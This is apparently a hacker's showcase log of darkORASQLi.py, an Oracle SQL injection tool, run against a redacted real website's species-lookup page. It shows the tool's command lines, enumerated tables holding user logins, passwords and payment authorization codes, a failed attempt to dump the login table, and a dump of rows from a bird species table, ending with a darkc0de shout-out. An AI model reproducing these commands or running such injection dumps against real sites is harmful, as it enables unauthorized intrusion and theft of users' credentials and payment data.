[6] USERS: HOME_PHONE,EMAIL,ZIP_CODE,STATE,CITY,ADDRESS,LAST_NAME,FIRST_NAME,LAST_UPDATE,CREAT_DATE,ADDRESS_2,USER_ID,COUNTRY,PRIMARY,OPT_IN,ORGANIZATION,TITLE
[7] USER_CIRCLE_HUMA: FIRST_NAME,LAST_NAME,EMAIL,ABBREV
[8] USER_LOGIN: PASS,LOGIN,USER_ID,LAST_LOGIN
[9] USER_ROLE: USER_ROLE_ID,USER_ID,ROLE_ID,SCOPE_TYPE,SCOPE_VALUE,EXPIRE_DATE
[10] USER_CIRCLE_CBC106: ROLE_ID,LOC_ID,USER_ID,ID,COUNT_YR
[11] USER_CIRCLE_BAK: ROLE_ID,LOC_ID,USER_ID,ID,COUNT_YR
[12] USER_REGION_BAK: ID,USER_ID,REGION_CODE,ROLE_ID
[13] PROJECT_USER_BAK: ROLE_ID,PROJ_ID,USER_ID
[14] USER_ROLE_BAK: USER_ROLE_ID,USER_ID,ROLE_ID,SCOPE_TYPE,SCOPE_VALUE,EXPIRE_DATE
[15] PAYMENTS_BK: DONATION,METHOD,AMOUNT,PROJ_ID,PAYMENT_DATE,PAYMENT_ID,USER_ID,COUNT_YR,AUTH_CODE,LOC_ID,NUM_UNITS,PAY_ID
[16] PLAN_TABLE: OTHER

[-] 22:44:38
[-] Total URL Requests: 126
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --dump -T USER_LOGIN -C USER_ID,LOGIN,PASS

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:46:31
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Dumping data from current database and Table "USER_LOGIN"
[+] and Column(s) ['USER_ID', 'LOGIN', 'PASS']

Seems like we dont have permission to view that table or it never exist!

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --dump -T WL_SPECIES -C SPECIES_CODE,COM_NAME,SCI_NAME,COM_NAME_UC,SCI_NAME_UC,TAXON_CODE

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:49:04
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Dumping data from current database and Table "WL_SPECIES"
[+] and Column(s) ['SPECIES_CODE', 'COM_NAME', 'SCI_NAME', 'COM_NAME_UC', 'SCI_NAME_UC', 'TAXON_CODE']
[+] Number of Rows: 11756

[1] estspa:Eastern Sharp-tailed Sparrow:Ammodramus caudacutus:EASTERN SHARP-TAILED SPARROW:AMMODRAMUS CAUDACUTUS:
[2] eucdov:Eurasian Collared-Dove:Streptopelia decaocto:EURASIAN COLLARED-DOVE:STREPTOPELIA DECAOCTO:12020020200:
[3] eucmer:(European) Common Merganser:Mergus merganser:(EUROPEAN) COMMON MERGANSER:MERGUS MERGANSER:07012160101:
[4] eugplo:European Golden-Plover:Pluvialis apricaria:EUROPEAN GOLDEN-PLOVER:PLUVIALIS APRICARIA:11022010200:
[5] euhspa:European House Sparrow:Passer domesticus:EUROPEAN HOUSE SPARROW:PASSER DOMESTICUS:
[6] eulgul:European Little Gull:Larus minutus:EUROPEAN LITTLE GULL:LARUS MINUTUS:11082010301:
[7] euphag:Euphagus sp.:Euphagus:EUPHAGUS SP.:EUPHAGUS:21246059999:
[8] eurbla:Eurasian Blackbird:Turdus merula:EURASIAN BLACKBIRD:TURDUS MERULA:21134100100:
[9] eurbul:Eurasian Bullfinch:Pyrrhula pyrrhula:EURASIAN BULLFINCH:PYRRHULA PYRRHULA:21252070100:
[10] eurcoo:Eurasian Coot:Fulica atra:EURASIAN COOT:FULICA ATRA:10011110100:
[11] eurcor:European Cormorant:Phalacrocorax carbo:EUROPEAN CORMORANT:PHALACROCORAX CARBO:
[12] eurcur:Eurasian Curlew:Numenius arquata:EURASIAN CURLEW:NUMENIUS ARQUATA:11071070700:
[13] eurgol:European Goldfinch:Carduelis carduelis:EUROPEAN GOLDFINCH:CARDUELIS CARDUELIS:21252050800:
[14] eurhob:Eurasian Hobby:Falco subbuteo:EURASIAN HOBBY:FALCO SUBBUTEO:08030020500:
40% to go.. till then.. keep r0x darkc0de!